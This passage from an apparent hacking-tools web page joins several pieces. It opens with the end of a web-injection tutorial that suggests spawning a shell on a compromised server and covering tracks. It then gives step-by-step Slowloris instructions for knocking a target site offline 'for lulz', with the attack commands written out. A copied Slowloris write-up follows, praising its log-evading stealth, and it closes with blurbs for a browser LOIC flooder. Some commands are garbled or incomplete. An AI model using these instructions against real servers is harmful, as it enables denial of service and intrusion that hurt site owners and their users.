files, etc. Do what you want and come back out. And if you don’t want to get

noticed, clean up after yourself. In the above example, instead of just causing

the password file (assuming it was your target file) in the page for everyone

to see, you could write a bit of perl code to spawn a shell on the server, or

provide a form interface in another file for easy access to further commands.

After setting up something like this, try to put the original file back the way

you found it, and chances are you won’t get noticed for longer.




In this document I use UNIX-style path and filenames. Most of the ideas I’ve

discussed here work exactly the same under NT and other platforms, it’s just

that I wrote these examples on a Linux system.


When you execute commands on the system, you do so with the rights of the user/

group the webserver runs as, which is usually nobody/nobody. This is enough

access for complete control over the files the webserver uses though.


I use perl scripts here for example purposes. If you don’t know perl you only

really need to pay attention to the sections marked ‘”active” part’, as these

are the sections that contain the vulnerable code.


If you’re testing these files out for yourself, make sure you set the

file/pathnames correctly, and remember to chmod your cgi scripts 755 so that

they are executable, and that you have specified the correct path to perl on

your system in the first line of each script. Also, in the SSI example, you

will need to chmod vuln2.shtml 777 since that file gets written to by the



These scripts are just simple examples. Sometimes you have to do a little more

work than this to get around filters, etc, but often it is possible.



Further information


There are a few articles out there. p41mit0 recommended this one:





Everyone in the CyberArmy – there are too many to mention ;-)

>Stopping a Web Server with Slowloris in Ubuntu


  1. Start Ubuntu.
  2. Open a browser and go to this URL:  ‘
  3. Scroll down to the bottom of the page and right click, the slowloris link ‘save link as’ and save the file to your desktop.
  4. Open another tab and type in your targets URL so you can reload it again later and get lulz when you see it’s down.
  5. Open a terminal and type this command: cd Desktop and hit enter. This moves the working directory to your desktop.
  6. Then type in your terminal: sudo apt-get install perl-doc and enter your password when prompted. This installs the Perl documentation module you’ll need to see the Slowloris help page. Wait while the packages download and install.
  7. Then type this command, (all in one line) and press enter: sudo get-apt install libhtml-parser-perl libio-socket-ssl-perl
  8. When ask yes/no type Y and press enter, this installs some libraries for Slowloris.
  9. Again type another command, this time: perldoc and hit enter. This will show the documentation for Slowloris. I usually type Crtl+X+Y=enter to save it as a record but if you like you can just scan it and type Crtl+X to get rid of it.
  10. The only way I know to use Slowlorisis a DNS name. So type this command in the terminal and hit enter: cd /etc This moves the working directory to /etc.
  11. In the terminal window type: sudo cp hosts hosts.bak and enter password if requested. This makes a backup copy of the hosts file incase you fuck up, (ya never know).
  12. In terminal type this: sudo nano hosts and hit enter.
  13. The hosts file should open in the nano text editor, add a line containing the IP address of your target and the DNS name – ( Save your changes, Crtl+X+Y+enter.
  14. Then type cd in the terminal and hit enter. This moves the working directory to your home direrctory.
  15. Then type cd Desktop and hit enter, this moves the working directory to your desktop.
  16. Next you should type sudo perl -dns -port 80 -test hit enter and password if requested. This tests the server to see what it’s timeout window is.
  17. Wait until the test finishes, it will take several minutes. When it’s done it will tell you what timeout value to use….something along the likes of ‘Use 240 seconds for -timeout’.
  18. In the terminal window type, (all one line) sudo perl -dns -port 80 -timeout 240 -num 500 -tcpto 5 This performs the actual attack, if your time out test told you to use another timeout value use that.
  19. In your browser window reload the target page and you should see an error message that the server is unavailable. The attack has made the target site unavailable to all users. Lulz!
  20. To stop the attack just type Ctrl+C.
  21. The page should load again straight away, and to attack again just repeat whenever you like and really piss ‘em off.
This will also work on other servers but at posting Apache is the only one I have personally tested it on. See ‘

p { margin-bottom: 0.21cm; }



This is the tool as far as I’m concerned…….this fucker MELTS shit! 

(lifted from the excellent blog site ‘ha.ckers’:
that unfortunately stop posting in December 2010)

Welcome to Slowloris – the low bandwidth, yet greedy and poisonous HTTP client!
Written by RSnake with help from John Kinsella, and a dash of inspiration from Robert E Lee.
UPDATE 2: Video presentation of Slowloris at DefCon (the middle section of the presentation) can be seen here: Hijacking Web 2.0 Sites with SSLstrip and SlowLoris — Sam Bowne and RSnake at Defcon 17.
UPDATE: Amit Klein pointed me to a post written by Adrian Ilarion Ciobanu written in early 2007 that perfectly describes this denial of service attack. It was also described in 2005 in the “Programming Model Attacks” section of Apache Security. So although there was no tool released at that time these two still technically deserves all the credit for this. I apologize for having missed these.
In considering the ramifications of a slow denial of service attack against particular services, rather than flooding networks, a concept emerged that would allow a single machine to take down another machine’s web server with minimal bandwidth and side effects on unrelated services and ports. The ideal situation for many denial of service attacks is where all other services remain intact but the webserver itself is completely inaccessible. Slowloris was born from this concept, and is therefore relatively very stealthy compared to most flooding tools.
Slowloris holds connections open by sending partial HTTP requests. It continues to send subsequent headers at regular intervals to keep the sockets from closing. In this way webservers can be quickly tied up. In particular, servers that have threading will tend to be vulnerable, by virtue of the fact that they attempt to limit the amount of threading they’ll allow. Slowloris must wait for all the sockets to become available before it’s successful at consuming them, so if it’s a high traffic website, it may take a while for the site to free up it’s sockets. So while you may be unable to see the website from your vantage point, others may still be able to see it until all sockets are freed by them and consumed by Slowloris. This is because other users of the system must finish their requests before the sockets become available for Slowloris to consume. If others re-initiate their connections in that brief time-period they’ll still be able to see the site. So it’s a bit of a race condition, but one that Slowloris will eventually always win – and sooner than later.
Slowloris also has a few stealth features built into it. Firstly, it can be changed to send different host headers, if your target is a virtual host and logs are stored seperately per virtual host. But most importantly, while the attack is underway, the log file won’t be written until the request is completed. So you can keep a server down for minutes at a time without a single log file entry showing up to warn someone who might watching in that instant. Of course once your attack stops or once the session gets shut down there will be several hundred 400 errors in the web server logs. That’s unavoidable as Slowloris sits today, although it may be possible to turn them into 200 OK messages instead by completing a valid request, but Slowloris doesn’t yet do that.
HTTPReady quickly came up as a possible solution to a Slowloris attack, because it won’t cause the HTTP server to launch until a full request is recieved. This is true only for GET and HEAD requests. As long as you give Slowloris the switch to modify it’s method to POST, HTTPReady turns out to be a worthless defense against this type of attack.
This is NOT a TCP DoS, because it is actually making a full TCP connection, not a partial one, however it is making partial HTTP requests. It’s the equivalent of a SYN flood but over HTTP. One example of the difference is that if there are two web-servers running on the same machine one server can be DoSed without affecting the other webserver instance. Slowloris would also theoretically work over other protocols like UDP, if the program was modified slightly and the webserver supported it. Slowloris is also NOT a GET request flooder. Slowloris requires only a few hundred requests at long term and regular intervals, as opposed to tens of thousands on an ongoing basis.
Interestingly enough, in testing this has been shown in at least one instance to lock up database connections and force other strange issues and errors to arise that can allow for fingerprinting and other odd things to become obvious once the DoS is complete and the server attempts to clean itself up. I would guess that this issue arises when the webserver is allowed to open more connections than the database is, causing the database to fail first and for longer than the webserver.
Slowloris lets the webserver return to normal almost instantly (usually within 5 seconds or so). That makes it ideal for certain attacks that may just require a brief down-time. As described in this blog post, DoS is actually very useful for certain types of attacks where timing is key, or as a diversionary tactic, etc….
This affects a number of webservers that use threaded processes and ironically attempt to limit that to prevent memory exhaustion – fixing one problem created another. This includes but is not necessarily limited to the following:

  • Apache 1.x
  • Apache 2.x
  • dhttpd
  • GoAhead WebServer
  • WebSense “block pages” (unconfirmed)
  • Trapeze Wireless Web Portal (unconfirmed)
  • Verizon’s MI424-WR FIOS Cable modem (unconfirmed)
  • Verizon’s Motorola Set-Top Box (port 8082 and requires auth – unconfirmed)
  • BeeWare WAF (unconfirmed)
  • Deny All WAF (unconfirmed)

There are a number of webservers that this doesn’t affect as well, in my testing:

This is obviously not a complete list, and there may be a number of variations on these web-servers that are or are not vulnerable. I didn’t test every configuration or variant, so your mileage may vary. This also may not work if there is an upstream device that somehow limits/buffers/proxies HTTP requests. Please note though that Slowloris only represents one variant of this attack and other variants may have different impacts on other webservers and upstream devices. This command should work on most systems, but please be sure to check the options as well:
perl -dns
Requirements: This is a Perl program requiring the Perl interpreter with the modules IO::Socket::INET, IO::Socket::SSL, and GetOpt::Long. Slowloris works MUCH better and faster if you have threading, so I highly encourage you to also install threads and threads::shared if you don’t have those modules already. You can install modules using CPAN:

perl -MCPAN -e ‘install IO::Socket::INET’
perl -MCPAN -e ‘install IO::Socket::SSL’ 

Windows users: You probably will not be able to successfuly execute a Slowloris denial of service from Windows even if you use Cygwin. I have not had any luck getting Slowloris to successfuly deny service from within Windows, because Slowloris requires more than a few hundred sockets to work (sometimes a thousand or more), and Windows limits sockets to around 130, from what I’ve seen. I highly suggest you use a *NIX operating system to execute Slowloris from for the best results, and not from within a virtual machine, as that could have unexpected results based on the parent operating system.
Version: Slowloris is currently at version 0.7 – 06/17/2009
Getting started: perldoc
Issues: For a complete list of issues look at the Perl documentation, which explains all of the things to think about when running this denial of service attack.

>Siteblaster Lazer


SiteBlaster is a visual, web site load and stress testing tool. It can be used to rapidly submit
requests to a site; substantially faster than can be done by a human. Or, it can be configured to
pause a random amount of time between submissions; approximating the behavior of a user.
SiteBlaster is designed to be very easy to use and is intended for software developers and
architects who want some early indication about the performance characteristics of the web sites
they create. SiteBlaster simulates Internet Explorer web browsing functionality. Consequently, a
web page that is well behaved in Internet Explorer should be well behaved in SiteBlaster.
SiteBlaster can not enter information into a web page or make decisions based on the content of
a web page. It is best used for those sites that use URL query strings to pass data to its web
Included in the RAR file is a PDF with useage instructions. 

>Mobile Java Script Loic


Basically the same as the normal LOIC but this one can be launched inside a browser. Very handy to carry (encrypted) on a USB flash drive.
There is also another version here:


Go to Top